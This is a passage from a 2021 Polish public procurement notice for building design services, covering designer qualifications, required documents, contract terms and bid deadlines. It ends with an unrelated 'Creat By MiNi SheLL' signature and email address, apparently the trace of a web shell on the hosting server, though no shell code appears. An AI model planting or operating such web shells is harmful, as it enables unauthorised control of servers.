wykonawczego.<br/>Zamawiający nie dopuszcza wykonania ww. projektów w ramach oddzielnych zadań. <br/>Usługi te winny być wykonane należycie.<br/>b)	dysponuje osobami, które będą skierowane przez Wykonawcę do realizacji niniejszego zamówienia publicznego, posiadającymi uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie – w szczególności: <br/>	projektant w branży architektonicznej posiadający uprawnienia budowlane do projektowania <br/>w specjalności architektonicznej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - posiadający, co najmniej 5-cio letnie doświadczenie zawodowe w realizacji projektów architektonicznych, <br/>	projektant w branży sanitarnej posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych, kanalizacyjnych lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, posiadający co najmniej 5-cio letnie doświadczenie zawodowe w realizacji projektów instalacji sanitarnych;<br/>	projektant w branży elektrycznej posiadający uprawnienia budowlane do projektowania <br/>w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych <br/>i elektroenergetycznych lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, posiadający minimum 5-cio letnie doświadczenie w opracowaniu dokumentacji projektowej w zakresie posiadanych uprawnień<br/><br/>UWAGA:<br/>Zamawiający dopuszcza łączenie poszczególnych funkcji przez jedną osobę, która spełnia łącznie warunki wymagane dla tych funkcji.W przypadku, gdy Wykonawca polega na zdolnościach innych podmiotów przy wykazaniu spełnienia warunku zdolności technicznej lub zawodowej zobowiązany jest wykazać, że podmioty te zrealizują prace projektowe do realizacji, których te zdolności są wymagane.<br/>Uprawnienia, o których mowa powyżej, winny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Zgodnie z art.12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, samodzielne funkcje techniczne <br/>w budownictwie, określone w art. 12 ust. 1 ww. ustawy, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, lub osoby spełniające wymogi, o których mowa w art. 20a ustawy z dnia 15 grudnia 2000 r., <br/>o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”). Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>Doświadczenie zawodowe będzie liczone od daty uzyskania uprawnień.<br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>Osoby wskazane w Wykazie osób (składanym na wezwanie w trybie art. 274 ustawy Pzp) winny legitymować się aktualnym zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: <br/>1)	Wykaz usług (w oryginale, w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, lub jako cyfrowe odwzorowanie dokumentu, sporządzonego jako dokument w postaci papierowej, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym) wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane – wg wzoru stanowiącego Załącznik nr 7 do nin. SWZ;<br/>2)	Dowody określające, czy wymienione w ww. wykazie usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami, wykaz o którym mowa w pkt. 1) dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń okresowych lub ciągłych, w których wykonaniu bezpośrednio uczestniczył lub uczestniczy.<br/>3)	Wykaz osób (w oryginale, w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, lub jako cyfrowe odwzorowanie dokumentu, sporządzonego jako dokument w postaci papierowej, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym) skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wg wzoru stanowiącego Załącznik nr 8 do nin. SWZ.<br/>UWAGA: <br/>Okres wyrażony w latach, o którym mowa powyżej w pkt 1), liczy się wstecz od dnia w którym upływa termin składania ofert w postępowaniu. <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie <br/>z innymi Wykonawcami, wykaz o którym mowa w pkt 1), dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>W Wykazie osób należy wskazać osoby, spełniające warunek opisany w Części VII pkt 8 ppkt 4 lit. b SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferta przet. (w formie elektr.opatrzonej kwalifikowanym podpisem elektr., lub w postaci elektronicznej opatrzonej pod.zaufanym lub pod. osob.). Ofertę należy sporządzić na Zał. nr 1 do nin. SWZ. <br/>2.	Formularz cenowy – zestawienie wartości prac projektowych (w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym) Zał. nr 2 do nin. SWZ. <br/>3.	Oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu (w formie elektronicznej opatrzonej kwali. pod. elekt., lub w postaci elekt.opatrzonej podpisem zaufanym lub podpisem osobistym) o którym mowa w art. 125 ust. 1 ustawy Pzp Zal. nr 3 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa powyżej składa każdy z Wykonawców. Oświ. te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postę.. <br/>4.	Przed. śr. dow.(w postaci elekt. opatrzonej kwalifi. pod. elekt., pod.zauf. lub pod. osobistym, lub jako cyfrowe odwz.e dok., sporządzonego jako dokument w postaci papierowej, opatrzone kwalif. pod. elekt., pod. zaufanym lub pod. osobistym), tj. dok. potwierdzające, że osoba wskazana w tabeli na końcu Formularza Oferta (zał. nr 1 do SWZ), zawier. inf. dotyczące kryterium II oceny ofert „Doświadczenie projektanta”, wykonywała usługi należycie.<br/>5.	Upow. (pełnomocnictwo) lub inny dok. (w oryginale, w postaci elek. opatrzonej kwalif. pod. elektr., pod.zaufanym lub pod. osobistym, lub jako cyfrowe odwz. dok., sporządzonego jako dok.w postaci papierowej, opatrzone kwalifi. pod. elektr., pod.zaufanym lub pod.osobistym), potwierdzający umocowanie do reprez. Wyk. (podpisania oferty), o ile nie wynika ono z dokumentów rejestrowych Wyk. Powyższy zapis stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zam. oraz do osoby działającej w imieniu pod. udost. zasoby Wyk..<br/>6.	Pełnom. do reprez. Wykonawców ubiegających się wspólnie (konsorcja, spółki cywilne) o przedmiotowe zamówienie (w oryginale, w postaci elektronicznej opatrzonej kwalifi. podpisem elekt., pod. zaufanym lub podp. osobistym, lubjako cyfrowe odwz. dok., sporządzonego jako dokument w postaci papierowej, opatrzone kwalifi. podp.elektr., pod. zaufanym lub pod. osobistym), określające zakres udzielonego pełn. (pełno. winien być powołany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie). <br/>7.	Zob. pod. udostęp. zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wyk. realizując zamówienie, będzie dysponował n lub zawodowych lub sytuacji finansowej lub ekon.j pod. udostęp. zasoby, zgodnie z art. 118 ust. 1 ustawy Pzp. Zobowiązanie podmiotu udostęp. zasoby lub innych pod. środek dowodowy, powinny potwierdzać, że stosunek łączący Wyk. z pod. udostęp. zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać <br/>w szczególności:<br/>a)	zakres dostępnych Wykonawcy zasobów podmiotu udost.zasoby;<br/>b)	sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udost. te zasoby przy wykonywaniu zamówienia;<br/>c)	czy i w jakim zakresie podmiot udost. zasoby, na zdol. którego Wyk. polega w odniesieniu do warunków udziału w post. dot. wykształcenia, kwal. zawodowych lub doś., zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <br/>Zaleca się, aby zobowiązanie podmiotu udost. zasoby przygotować na druku zgodnym ze wzorem, stanowiącym Zał. nr 4 do nin. SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają na formularzu<br/>Ogłoszenie nr 2021/BZP 00271853/01 z dnia 2021-11-17<br/>2021-11-17 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>OFERTA oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z par. 17 wzoru umowy stanowiącym załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://um-bielsko.logintrade.net/rejestracja/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com